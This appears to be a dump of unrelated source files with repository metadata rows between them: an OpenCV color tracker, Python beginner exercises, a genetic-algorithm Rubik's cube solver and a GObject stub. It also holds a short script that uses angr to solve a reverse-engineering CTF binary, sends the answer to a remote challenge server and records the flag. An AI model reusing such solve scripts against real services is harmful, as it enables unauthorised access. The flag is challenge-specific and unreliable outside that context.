    :param desci: replacement _testMethodDoc used when the case is skipped
    :return: None
    """
    if only_test_caseids.strip() == '':
        return
    exact_ids = []
    id_ranges = []
    for token in only_test_caseids.split(','):
        if '-' in token:
            parts = token.split('-')
            low = parts[0].strip()
            high = parts[1].strip()
            if low != '' and high != '':
                if high < low:
                    low, high = high, low
                id_ranges.append([low, high])
        else:
            exact_ids.append(token.strip())
    if testcaseid in exact_ids:
        return
    if any(low <= testcaseid <= high for low, high in id_ranges):
        return
    test_cls._testMethodDoc = desci
    test_cls.skipTest('没有在指定执行的TestCase列表中')
| [
"Sincave.Zhang@tech-trans.com"
] | Sincave.Zhang@tech-trans.com |
6c8ac1427f142513c13bd7794b07ab96a6f4c884 | 751cf52d62dba7d88387fc5734d6ee3954054fc2 | /opencv/experiments_raw/contourExperiments/contourExperiment.py | 25321959930231caf2a2607e82fe2c8687768cfe | [
"MIT"
] | permissive | nooralight/lab-computer-vision | 70a4d84a47a14dc8f5e9796ff6ccb59d4451ff27 | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | refs/heads/master | 2023-03-17T12:45:22.700237 | 2017-07-11T22:17:09 | 2017-07-11T22:17:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | """
Display three views:
original frame
mask
resultant frame
whenever user clicks in original frame, color is specified
this color becomes the new mask color
The system then creates a contour around the largest object of that color on the screen, and a crosshair follows after that object
"""
import cv2
import numpy as np
color = np.array([0,0,0])
# CRAN = 20
# CRanArr = np.array([20, 10, 10])
# try (0, 50, 10)
def findHSV(bgr):
    """Convert a single BGR triple to its HSV representation (as a 1x1 image)."""
    pixel = np.uint8([[bgr]])
    return cv2.cvtColor(pixel, cv2.COLOR_BGR2HSV)
def drawXHair(img, y, x):
    """Draw a red crosshair (circle plus horizontal/vertical ticks) of
    20 px radius centered on (x, y) in ``img`` (drawn in place)."""
    color = (0, 0, 255)  # BGR red
    radius = 20
    thickn = 2
    # Consistency fix: the circle previously hard-coded 20 instead of `radius`,
    # so changing the radius would have desynced the circle from the ticks.
    cv2.circle(img, (int(x), int(y)), radius, color, thickn)
    cv2.line(img, (x - radius, y), (x + radius, y), color, thickn)
    cv2.line(img, (x, y - radius), (x, y + radius), color, thickn)
def colorSelect(event, x, y, flags, param):
    # Mouse callback for the 'frame' window: on left-button release, sample
    # the clicked pixel and make its HSV value the new tracking color.
    global color
    if event == cv2.EVENT_LBUTTONUP:
        # NOTE(review): `frame` is the module-level frame assigned inside the
        # capture loop below; this assumes at least one frame has been read
        # before the first click -- confirm.
        color_rgb = frame[y, x, 0:3]
        color = findHSV(color_rgb)
        print(color)
def doNothing(x):
    """No-op trackbar callback (cv2.createTrackbar requires a callable)."""
    return None
cap = cv2.VideoCapture(0)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', colorSelect)
cv2.namedWindow('trackbars')
cv2.createTrackbar('H', 'trackbars', 0, 50, doNothing)
cv2.createTrackbar('S', 'trackbars', 50, 50, doNothing)
cv2.createTrackbar('V', 'trackbars', 10, 50, doNothing)
while(1):
dh = cv2.getTrackbarPos('H', 'trackbars')
ds = cv2.getTrackbarPos('S', 'trackbars')
dv = cv2.getTrackbarPos('V', 'trackbars')
CRanArr = np.array([dh, ds, dv])
# take each frame
_, frame = cap.read()
print(np.shape(frame))
# convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of blue color in HSV
# lower_color = color + np.array([-CRAN, -CRAN, -CRAN])
# upper_color = color + np.array([CRAN, CRAN, CRAN])
lower_color = color - CRanArr
upper_color = color + CRanArr
# print lower_color , '|' , upper_color
# threshold the HSV image to get only blue colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Noise removal experimentation
kernel = np.ones((20,20), np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# mask = cv2.erode(mask, kernel, iterations = 1)
# mask = cv2.dilate(mask, kernel, iterations=5)
ret, thresh = cv2.threshold(mask, 127, 255, 0)
im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(mask, contours, -1, 150, 3)
area = 0
largest_contour = 0
for i in xrange(len(contours)):
if cv2.contourArea(contours[i])>area:
largest_contour = i
cv2.drawContours(mask, contours, largest_contour, 150, 3)
print len(contours)
if len(contours)>0:
M = cv2.moments(contours[largest_contour])
if M['m00']>0:
cx = int(M['m10']/(M['m00']))
cy = int(M['m01']/(M['m00']))
print cx ,'|', cy
drawXHair(frame, cy, cx)
print(color)
# bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask= mask)
cv2.imshow('frame', frame)
cv2.imshow('mask', mask)
cv2.imshow('res', res)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| [
"danbudanov@gmail.com"
] | danbudanov@gmail.com |
4056ac1639854fe1a8734faa3016b7ccacbec880 | fb52ae5d98c4bcbba40c33fc0e23af1d532e7b8f | /Python/Python从入门到实践/基础知识/5if语句.py | 105b1c5fa639c38a14acb2b4dda4c5ddefbe92e8 | [] | no_license | zhengchaoxuan/Lesson-Code | 46426072d1b26191070fcc45c313f54c8db48cc5 | 872cd7074f5411ed5e7a23b99224fe0ed75a335a | refs/heads/master | 2021-03-14T04:43:01.299333 | 2020-08-21T07:12:47 | 2020-08-21T07:12:47 | 246,737,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | # 该代码是python从入门到实践的练习源码
# date: 2020/07/19
# version: 0.1
# including:
# 1. the `in` and `not in` keywords
# 2. checking that a list is not empty
# Exercise 5-3: reward depends on the alien's color.
alien_color = 'greens'
if alien_color =='green':
    print('you win the 5 scores')
elif alien_color =='red':
    print('you win the 10 scores')
else:
    print('you win the 15 scores')
# Exercise 5-7: membership test with `in`.
alien_colors = ['green','red','greens']
if alien_color in alien_colors:
    print('you win the 10 scores')
# Exercise 5-8: greet the admin specially; handle an empty user list.
admins = ['admin','wz','wqd','cxk','pyy']
if admins: # a non-empty list is truthy
    if 'admin' in admins:
        print('Hello admin would you like to see a status report?')
    else:
        print("hello,Eric,thank you for logging in again")
else:
    print("we need to find some users")
# Exercise 5-10: check proposed usernames against existing ones.
print('\n')
current_users = ['zcx','wz','wqd','cxk','pyy']
new_users = ['zcx','wmt','qyl','hxt','zbm']
for new_user in new_users:
    if new_user.lower() in current_users:
        print('please enter other name!')
    else:
        print('the name not be used!')
# Exercise 5-11: ordinal suffixes for the numbers 1..9.
print('\n')
lists = list(range(1,10))
for list1 in lists:
    if list1 == 1:
        print(str(list1)+'st')
    elif list1 == 2:
        print(str(list1)+'nd')
    elif list1 == 3:
        print(str(list1)+'rd')
    else:
        print(str(list1)+'th')
| [
"1139500799@qq.com"
] | 1139500799@qq.com |
d4c59887844231906cc69d067be102ec4d25bc76 | 6f0fe60f57dfb8c1055afc91d58f4975cf54ce26 | /Cuberoid.py | 60331bec69d6d20630e4edb83f5400c04bdf9e66 | [] | no_license | Developer-Achu/Cuberoid | ad7132e840402fafd61cd84cb38f99dfb6634db1 | 41195e1f781bbf0af6649bee2777f6e32e234844 | refs/heads/master | 2022-07-05T13:10:51.406119 | 2020-05-17T21:57:20 | 2020-05-17T21:57:20 | 238,088,693 | 0 | 0 | null | 2020-05-17T21:57:22 | 2020-02-04T00:11:32 | Python | UTF-8 | Python | false | false | 21,291 | py | import os
import pickle
import sys
import matplotlib.pyplot as plt
from Chromosome import *
from DefineStates import *
# Seed the module-level RNG for reproducible runs.  NOTE(review): both
# `random` and `CubeConstants` must come from the star imports above
# (presumably DefineStates) -- neither is imported explicitly here; confirm.
random.seed(CubeConstants.seed)
class Cuberoid:
    def __init__(self, _configuration, _n, _chromosome_length, _population_size, _mutation_rate, _max_iterations,
                 _elite, _config_combination):
        """Set up GA state for an _n-sized cube and build the initial population.

        :param _configuration: six per-face sticker layouts, indexed 0..5
        :param _n: cube dimension
        :param _chromosome_length: number of genes (moves) per chromosome
        :param _population_size: chromosomes per generation
        :param _mutation_rate: per-child mutation probability
        :param _max_iterations: generation budget for a run
        :param _elite: elitism setting (consumed by the evolve loop)
        :param _config_combination: 1..27, selects the (selection, crossover,
            mutation) operator triple from config_dict below
        """
        # --- per-run GA state and collected statistics ---
        self.population = []
        self.initial_population = []
        self.mating_pool = []
        self.updated_mating_pool = []
        self.best = None
        self.best_iteration = 0
        self.iteration = 0
        self.all_best_fitness = []
        self.iteration_list = []
        self.all_avg_fitness = []
        self.each_best_fitness = []
        # --- scrambled-cube configuration, one entry per face ---
        self.side_0 = _configuration[0]
        self.side_1 = _configuration[1]
        self.side_2 = _configuration[2]
        self.side_3 = _configuration[3]
        self.side_4 = _configuration[4]
        self.side_5 = _configuration[5]
        # --- GA hyper-parameters ---
        self.n = _n
        self.chromosome_length = _chromosome_length
        self.population_size = _population_size
        self.mutation_rate = _mutation_rate
        self.max_iterations = _max_iterations
        self.elite = _elite
        self.config_combination = _config_combination
        # Operator dispatch table: 3 selections x 3 crossovers x 3 mutations.
        # Keys 1-9 roulette wheel, 10-18 tournament, 19-27 no selection; within
        # each group of 9: one-point / two-point / uniform crossover, each with
        # random / inversion / scramble mutation.
        self.config_dict = {
            1: (self.roulette_wheel, self.one_point_crossover, self.random_mutation),
            2: (self.roulette_wheel, self.one_point_crossover, self.inversion_mutation),
            3: (self.roulette_wheel, self.one_point_crossover, self.scramble_mutation),
            4: (self.roulette_wheel, self.two_point_crossover, self.random_mutation),
            5: (self.roulette_wheel, self.two_point_crossover, self.inversion_mutation),
            6: (self.roulette_wheel, self.two_point_crossover, self.scramble_mutation),
            7: (self.roulette_wheel, self.uniform_crossover, self.random_mutation),
            8: (self.roulette_wheel, self.uniform_crossover, self.inversion_mutation),
            9: (self.roulette_wheel, self.uniform_crossover, self.scramble_mutation),
            10: (self.tournament, self.one_point_crossover, self.random_mutation),
            11: (self.tournament, self.one_point_crossover, self.inversion_mutation),
            12: (self.tournament, self.one_point_crossover, self.scramble_mutation),
            13: (self.tournament, self.two_point_crossover, self.random_mutation),
            14: (self.tournament, self.two_point_crossover, self.inversion_mutation),
            15: (self.tournament, self.two_point_crossover, self.scramble_mutation),
            16: (self.tournament, self.uniform_crossover, self.random_mutation),
            17: (self.tournament, self.uniform_crossover, self.inversion_mutation),
            18: (self.tournament, self.uniform_crossover, self.scramble_mutation),
            19: (self.no_selection, self.one_point_crossover, self.random_mutation),
            20: (self.no_selection, self.one_point_crossover, self.inversion_mutation),
            21: (self.no_selection, self.one_point_crossover, self.scramble_mutation),
            22: (self.no_selection, self.two_point_crossover, self.random_mutation),
            23: (self.no_selection, self.two_point_crossover, self.inversion_mutation),
            24: (self.no_selection, self.two_point_crossover, self.scramble_mutation),
            25: (self.no_selection, self.uniform_crossover, self.random_mutation),
            26: (self.no_selection, self.uniform_crossover, self.inversion_mutation),
            27: (self.no_selection, self.uniform_crossover, self.scramble_mutation)
        }
        # Bind the operators chosen by _config_combination.
        self.mating_pool_updation = self.config_dict[self.config_combination][0]
        self.crossover = self.config_dict[self.config_combination][1]
        self.mutation = self.config_dict[self.config_combination][2]
        self.create_population()
def create_population(self):
for i in range(0, self.population_size):
chromosome = Chromosome(self.side_0, self.side_1, self.side_2, self.side_3, self.side_4, self.side_5,
self.chromosome_length, self.n)
chromosome.compute_fitness()
self.initial_population.append(chromosome)
def initialize_generation(self):
self.population = []
self.mating_pool = []
self.updated_mating_pool = []
self.best = None
self.best_iteration = 0
self.iteration = 0
for chromosome in self.initial_population:
chromosome_copy = chromosome.get_chromosome_copy()
self.update_best_child(chromosome_copy)
self.population.append(chromosome_copy)
def update_best_child(self, child):
if self.best is None or child.get_fitness() < self.best.get_fitness():
self.best = child.get_chromosome_copy()
self.best_iteration = self.iteration
self.all_best_fitness.append(self.best.get_fitness())
self.iteration_list.append(self.iteration)
sys.stdout.write(
"\r%s%d%s%d%s" % ("Iteration : ", self.iteration, " Cost: ", self.best.get_fitness(), "\n"))
sys.stdout.flush()
def random_selection(self):
parent_1 = self.mating_pool[random.randint(0, len(self.mating_pool) - 1)].get_chromosome_copy()
parent_2 = self.mating_pool[random.randint(0, len(self.mating_pool) - 1)].get_chromosome_copy()
return [parent_1, parent_2]
def one_point_crossover(self, parent_1, parent_2):
random_point = random.randint(0, self.chromosome_length - 1)
for i in range(random_point, self.chromosome_length):
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def two_point_crossover(self, parent_1, parent_2):
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
for i in range(start_index, end_index + 1):
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def uniform_crossover(self, parent_1, parent_2):
for i in range(self.chromosome_length):
if random.random() < 0.5:
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def random_mutation(self, child):
if random.random() < self.mutation_rate:
if random.random() < 0.5:
# random new gene
random_index = random.randint(0, self.chromosome_length - 1)
child.genes[random_index] = get_a_state_change()
else:
# flip a random bit on the gene
random_index = random.randint(0, self.chromosome_length - 1)
random_index_of_gene = random.randint(0, 5)
child.genes[random_index][random_index_of_gene] = (1 - child.genes[random_index][random_index_of_gene])
child.compute_fitness()
self.update_best_child(child)
def inversion_mutation(self, child):
if random.random() < self.mutation_rate:
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
child.genes[start_index:end_index + 1] = child.genes[start_index:end_index + 1][::-1]
child.compute_fitness()
self.update_best_child(child)
def scramble_mutation(self, child):
if random.random() < self.mutation_rate:
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
indices_list = list(range(start_index, end_index + 1))
random.shuffle(indices_list)
new_gene = []
for gene in child.genes:
ng = []
for pos in range(len(gene)):
ng.append(gene[pos])
new_gene.append(ng)
for index in range(start_index, end_index + 1):
new_gene[index] = child.genes[indices_list[index - start_index]]
child.set_genes(new_gene)
child.compute_fitness()
self.update_best_child(child)
def roulette_wheel(self):
self.mating_pool = []
for chromosome in self.population:
count = (((self.n ** 2) * 6) - chromosome.get_fitness())
for _ in range(count):
self.mating_pool.append(chromosome)
def tournament(self):
self.mating_pool = []
for i in range(self.population_size):
chromosome_1 = self.population[random.randint(0, self.population_size - 1)]
chromosome_2 = self.population[random.randint(0, self.population_size - 1)]
if chromosome_1.get_fitness() < chromosome_2.get_fitness():
self.mating_pool.append(chromosome_1)
else:
self.mating_pool.append(chromosome_2)
def no_selection(self):
self.mating_pool = self.population
def gen_replacement(self, new_population):
x = int(self.population_size * self.elite / 100)
best_x = []
worst_in_best = 0
worst_in_best_pos = 0
worst_x = []
best_in_worst = (self.n ** 2) * 6
best_in_worst_pos = 0
for i in range(x):
best_x.append(self.population[i])
if self.population[i].get_fitness() > worst_in_best:
worst_in_best = self.population[i].get_fitness()
worst_in_best_pos = i
worst_x.append(new_population[i])
if new_population[i].get_fitness() < best_in_worst:
best_in_worst = new_population[i].get_fitness()
best_in_worst_pos = i
for i in range(x, self.population_size):
if self.population[i].get_fitness() < worst_in_best:
best_x[worst_in_best_pos] = self.population[i]
worst_in_best = self.population[i].get_fitness()
for best_pos in range(0, x):
if best_x[best_pos].get_fitness() > worst_in_best:
worst_in_best = best_x[best_pos].get_fitness()
worst_in_best_pos = best_pos
if new_population[i].get_fitness() > best_in_worst:
worst_x[best_in_worst_pos] = new_population[i]
best_in_worst = new_population[i].get_fitness()
for worst_pos in range(0, x):
if worst_x[worst_pos].get_fitness() < best_in_worst:
best_in_worst = worst_x[worst_pos].get_fitness()
best_in_worst_pos = worst_pos
pos = 0
for i in range(self.population_size):
if new_population[i].get_fitness() >= best_in_worst:
new_population[i] = best_x[pos]
pos += 1
if pos == x:
break
self.population = new_population
def create_new_generation(self):
length = self.population_size
new_population = []
for _ in range(length):
parents = self.random_selection()
child = self.crossover(parents[0], parents[1])
self.mutation(child)
new_population.append(child)
self.gen_replacement(new_population)
def genetic_algorithm(self):
self.mating_pool_updation()
self.create_new_generation()
def find_average_fitness(self):
total = 0
for chromosome in self.population:
total += chromosome.get_fitness()
return total / len(self.population)
def solve(self):
self.iteration = 0
self.each_best_fitness = []
self.all_avg_fitness = []
while self.best.get_fitness() != 0 and self.iteration < self.max_iterations:
if self.iteration % 100 == 0:
sys.stdout.write("\r%s%d" % ("Iteration : ", self.iteration))
sys.stdout.flush()
self.genetic_algorithm()
self.each_best_fitness.append(self.best.get_fitness())
self.all_avg_fitness.append(self.find_average_fitness())
self.iteration += 1
# self.all_best_fitness.append(self.best.get_fitness())
print("\nPopulation size:", self.population_size)
print("Total iterations: ", self.iteration)
print("Best fitness: ", self.best.get_fitness())
# print("Average fitness of the final generation: ", self.find_average_fitness())
if self.best.get_fitness() == 0:
print("Best solution moves: ", print_moves(self.best.genes))
print("=======================================")
print("\n")
return self.best.get_fitness()
def write_to_file(fitness_across_initializations, config_combination, population_size, mutation_rate, iterations,
elite):
try:
os.mkdir(CubeConstants.directory_name)
except:
pass
data_dict = {}
data_dict.update({
"init": ["init-" + str(i) for i in range(len(fitness_across_initializations))]
})
for item in fitness_across_initializations:
for r in range(len(item)):
retries = []
for i in range(len(fitness_across_initializations)):
retries.append(fitness_across_initializations[i][r])
data_dict.update({
"r-" + str(r): retries
})
file_name = CubeConstants.directory_name + CubeConstants.file_name + str(population_size) + "-" + str(
mutation_rate) + "-" + str(iterations) + "-" + str(elite) + "-" + str(config_combination)
# file_name = CubeConstants.directory_name + CubeConstants.file_name + str(config_combination)
with open(file_name, 'w') as file:
for key in data_dict.keys():
file.write(key)
item = data_dict[key]
for element in item:
file.write(" " + str(element))
file.write("\n")
file.close()
def plot_graph(each_best_fitness, all_avg_fitness, current_path, initialization, retry):
plt.figure()
plt.plot(np.arange(0, len(all_avg_fitness)), all_avg_fitness, label="Average fitness")
plt.plot(np.arange(0, len(each_best_fitness)), each_best_fitness,
label="Best fitness = " + str(each_best_fitness[-1]))
plt.legend()
plt.savefig(current_path + "fig-i" + str(initialization) + "r" + str(retry))
plt.close()
# def write_evaluation_results(best_fitness_across_initializations, best_iteration_across_initializations,
# population_size, mutation_rate, iterations, elite):
# try:
# os.mkdir(CubeConstants.evaluation_directory_name)
# except:
# pass
#
# file_name = CubeConstants.evaluation_directory_name + CubeConstants.file_name + str(population_size) + "-" + str(
# mutation_rate) + "-" + str(iterations) + "-" + str(elite) + "-" + str(config_combination)
# with open(file_name, 'w') as file:
# for i in range(len(best_fitness_across_initializations)):
# file.write("i:" + str(i))
# file.write("\n")
# for j in range(len(best_fitness_across_initializations[i])):
# file.write(
# str(best_iteration_across_initializations[i][j]) + ":" + str(
# best_fitness_across_initializations[i][j]))
# file.write("\n")
# file.write("plot:" + str(i))
# file.write("\n")
# file.close()
n = 3
if len(sys.argv) == 9:
re_initializations = int(sys.argv[1])
retries = int(sys.argv[2])
chromosome_length = int(sys.argv[3])
population_size = int(sys.argv[4])
mutation_rate = float(sys.argv[5])
iterations = int(sys.argv[6])
elite = float(sys.argv[7])
config_combination = int(sys.argv[8])
else:
print("Invalid argument count")
exit(0)
# re_initializations = 1
# retries = 1
# chromosome_length = 5
# population_size = 10
# mutation_rate = 0.05
# iterations = 1
# elite = 0
# config_combination = 4
if config_combination == 1:
print("Roulette selection --> one-point crossover --> random mutation")
elif config_combination == 2:
print("Roulette selection --> one-point crossover --> inversion mutation")
elif config_combination == 3:
print("Roulette selection --> one-point crossover --> scramble mutation")
elif config_combination == 4:
print("Roulette selection --> two-point crossover --> random mutation")
elif config_combination == 5:
print("Roulette selection --> two-point crossover --> inversion mutation")
elif config_combination == 6:
print("Roulette selection --> two-point crossover --> scramble mutation")
elif config_combination == 7:
print("Roulette selection --> uniform crossover --> random mutation")
elif config_combination == 8:
print("Roulette selection --> uniform crossover --> inversion mutation")
elif config_combination == 9:
print("Roulette selection --> uniform crossover --> scramble mutation")
elif config_combination == 10:
print("Tournament selection --> one-point crossover --> random mutation")
elif config_combination == 11:
print("Tournament selection --> one-point crossover --> inversion mutation")
elif config_combination == 12:
print("Tournament selection --> one-point crossover --> scramble mutation")
elif config_combination == 13:
print("Tournament selection --> two-point crossover --> random mutation")
elif config_combination == 14:
print("Tournament selection --> two-point crossover --> inversion mutation")
elif config_combination == 15:
print("Tournament selection --> two-point crossover --> scramble mutation")
elif config_combination == 16:
print("Tournament selection --> uniform crossover --> random mutation")
elif config_combination == 17:
print("Tournament selection --> uniform crossover --> inversion mutation")
elif config_combination == 18:
print("Tournament selection --> uniform crossover --> scramble mutation")
elif config_combination == 19:
print("No selection --> one point crossover --> random mutation")
elif config_combination == 20:
print("No selection --> one-point crossover --> inversion mutation")
elif config_combination == 21:
print("No selection --> one-point crossover --> scramble mutation")
elif config_combination == 22:
print("No selection --> two-point crossover --> random mutation")
elif config_combination == 23:
print("No selection --> two-point crossover --> inversion mutation")
elif config_combination == 24:
print("No selection --> two-point crossover --> scramble mutation")
elif config_combination == 25:
print("No selection --> uniform crossover --> random mutation")
elif config_combination == 26:
print("No selection --> uniform crossover --> inversion mutation")
elif config_combination == 27:
print("No selection --> uniform crossover --> scramble mutation")
file_name = str(n) + "x" + str(n)
file = open(file_name, "rb")
list_of_configurations = pickle.load(file)
try:
os.mkdir(CubeConstants.evaluation_directory_name)
except:
pass
for index, configuration in enumerate(list_of_configurations):
current_path = CubeConstants.evaluation_directory_name + "Orientation-" + str(index + 1) + "/"
try:
os.mkdir(current_path)
except:
pass
best_fitness_across_initializations = []
best_iteration_across_initializations = []
best_fitness = 0
seed_value = CubeConstants.seed
print("Cube orientation: " + str(index + 1))
for initialization in range(re_initializations):
CubeConstants.seed = seed_value
print("initialization: " + str(initialization))
print("chromosome length: " + str(chromosome_length))
cuberoid = Cuberoid(
configuration,
n,
chromosome_length,
population_size,
mutation_rate,
iterations,
elite,
config_combination
)
best_fitness_across_retries = []
for retry in range(retries):
CubeConstants.seed = seed_value + (retry * 1000)
random.seed(CubeConstants.seed)
print("seed value: " + str(CubeConstants.seed))
print("retry: " + str(retry))
print("\n")
cuberoid.initialize_generation()
best_fitness = cuberoid.solve()
# best_fitness_across_retries.append(best_fitness)
plot_graph(cuberoid.each_best_fitness, cuberoid.all_avg_fitness, current_path, initialization, retry)
if best_fitness == 0:
# pass
break
# best_fitness_across_initializations.append(best_fitness_across_retries)
# best_fitness_across_initializations.append(cuberoid.all_best_fitness)
# best_iteration_across_initializations.append(cuberoid.iteration_list)
if best_fitness == 0:
# pass
break
# write_evaluation_results(best_fitness_across_initializations, best_iteration_across_initializations,
# population_size, mutation_rate, iterations, elite)
# write_to_file(best_fitness_across_initializations, config_combination, population_size, mutation_rate, iterations,
# elite)
| [
"achuunnikrishnan1@gmail.com"
] | achuunnikrishnan1@gmail.com |
ce5f5ad35cd9724f793635facd78f30c9089db02 | 93f3cbe9e3b5ec732cd9cbb4e144f74d45a439ad | /rev3/solve.py | 5ffb1af272998091cd74fb759168200b46263bd8 | [] | no_license | bennofs/cscg20 | 574256a17036f3c08a3cacca47f216466623ac88 | 8f1377ee5003cbf75fe4675a4cc43ccc8b0254e7 | refs/heads/master | 2022-09-11T03:15:45.298241 | 2020-05-31T18:15:53 | 2020-05-31T23:36:59 | 248,774,365 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!/usr/bin/env python3
import angr
import socket
p = angr.Project("./rev3")
sm = p.factory.simulation_manager(p.factory.entry_state())
sm.explore(find=lambda s: b"right" in s.posix.dumps(1))
s = socket.socket()
s.connect(("hax1.allesctf.net", 9602))
print(s.recv(100))
s.send(sm.one_found.posix.dumps(0))
print(s.recv(100))
print(s.recv(100))
# CSCG{pass_1_g3ts_a_x0r_p4ss_2_g3ts_a_x0r_EVERYBODY_GETS_A_X0R}
| [
"benno.fuenfstueck@gmail.com"
] | benno.fuenfstueck@gmail.com |
d75b698c226ed15a03af9baa81e247e3850aada7 | 92e0cb619b50b465082adc7058447c377447f7ce | /Test code12.py | c4befcceb5f3ccf0907b3be2ae01f5133bf7ea42 | [] | no_license | KeDixMCA/Test | f991bfc72490e4dfc644351a3bf800929bbd2a27 | ff7f7992b2553b6d0d488de775cd7fd2e3ef091e | refs/heads/master | 2023-01-30T13:44:24.640412 | 2020-12-16T05:28:47 | 2020-12-16T05:28:47 | 316,904,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | x = 1 / 2 + 3 // 3 + 4 ** 2
print(x) | [
"61177206+KeDixMCA@users.noreply.github.com"
] | 61177206+KeDixMCA@users.noreply.github.com |
76c88c378f30434c23ff53230551d62966e81f4c | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Dazzle/SettingsSandwich.py | 4bf884a1566ec11046ea8ac3aff429377d644bff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 18,357 | py | # encoding: utf-8
# module gi.repository.Dazzle
# from /usr/lib64/girepository-1.0/Dazzle-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.Gio as __gi_overrides_Gio
import gi.overrides.GObject as __gi_overrides_GObject
import gi.overrides.Gtk as __gi_overrides_Gtk
import gi.repository.Gio as __gi_repository_Gio
import gi.repository.GObject as __gi_repository_GObject
import gi.repository.Gtk as __gi_repository_Gtk
import gobject as __gobject
class SettingsSandwich(__gi_overrides_GObject.Object):
"""
:Constructors:
::
SettingsSandwich(**properties)
new(schema_id:str, path:str) -> Dazzle.SettingsSandwich
"""
def append(self, settings): # real signature unknown; restored from __doc__
""" append(self, settings:Gio.Settings) """
pass
def bind(self, key, p_object=None, property, flags): # real signature unknown; restored from __doc__
""" bind(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags) """
pass
def bind_property(self, *args, **kwargs): # real signature unknown
pass
def bind_property_full(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def bind_with_mapping(self, key, p_object=None, property, flags, get_mapping, set_mapping, user_data=None): # real signature unknown; restored from __doc__
""" bind_with_mapping(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags, get_mapping:Gio.SettingsBindGetMapping, set_mapping:Gio.SettingsBindSetMapping, user_data=None) """
pass
def chain(self, *args, **kwargs): # real signature unknown
pass
def compat_control(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def connect(self, *args, **kwargs): # real signature unknown
pass
def connect_after(self, *args, **kwargs): # real signature unknown
pass
def connect_data(self, detailed_signal, handler, *data, **kwargs): # reliably restored by inspect
"""
Connect a callback to the given signal with optional user data.
:param str detailed_signal:
A detailed signal to connect to.
:param callable handler:
Callback handler to connect to the signal.
:param *data:
Variable data which is passed through to the signal handler.
:param GObject.ConnectFlags connect_flags:
Flags used for connection options.
:returns:
A signal id which can be used with disconnect.
"""
pass
def connect_object(self, *args, **kwargs): # real signature unknown
pass
def connect_object_after(self, *args, **kwargs): # real signature unknown
pass
def disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def disconnect_by_func(self, *args, **kwargs): # real signature unknown
pass
def emit(self, *args, **kwargs): # real signature unknown
pass
def emit_stop_by_name(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def find_property(self, property_name): # real signature unknown; restored from __doc__
""" find_property(self, property_name:str) -> GObject.ParamSpec """
pass
def force_floating(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def freeze_notify(self): # reliably restored by inspect
"""
Freezes the object's property-changed notification queue.
:returns:
A context manager which optionally can be used to
automatically thaw notifications.
This will freeze the object so that "notify" signals are blocked until
the thaw_notify() method is called.
.. code-block:: python
with obj.freeze_notify():
pass
"""
pass
def getv(self, names, values): # real signature unknown; restored from __doc__
""" getv(self, names:list, values:list) """
pass
def get_boolean(self, key): # real signature unknown; restored from __doc__
""" get_boolean(self, key:str) -> bool """
return False
def get_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_default_value(self, key): # real signature unknown; restored from __doc__
""" get_default_value(self, key:str) -> GLib.Variant """
pass
def get_double(self, key): # real signature unknown; restored from __doc__
""" get_double(self, key:str) -> float """
return 0.0
def get_int(self, key): # real signature unknown; restored from __doc__
""" get_int(self, key:str) -> int """
return 0
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_property(self, *args, **kwargs): # real signature unknown
pass
def get_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_string(self, key): # real signature unknown; restored from __doc__
""" get_string(self, key:str) -> str """
return ""
def get_uint(self, key): # real signature unknown; restored from __doc__
""" get_uint(self, key:str) -> int """
return 0
def get_user_value(self, key): # real signature unknown; restored from __doc__
""" get_user_value(self, key:str) -> GLib.Variant """
pass
def get_value(self, key): # real signature unknown; restored from __doc__
""" get_value(self, key:str) -> GLib.Variant """
pass
def handler_block(obj, handler_id): # reliably restored by inspect
"""
Blocks the signal handler from being invoked until
handler_unblock() is called.
:param GObject.Object obj:
Object instance to block handlers for.
:param int handler_id:
Id of signal to block.
:returns:
A context manager which optionally can be used to
automatically unblock the handler:
.. code-block:: python
with GObject.signal_handler_block(obj, id):
pass
"""
pass
def handler_block_by_func(self, *args, **kwargs): # real signature unknown
pass
def handler_disconnect(*args, **kwargs): # reliably restored by inspect
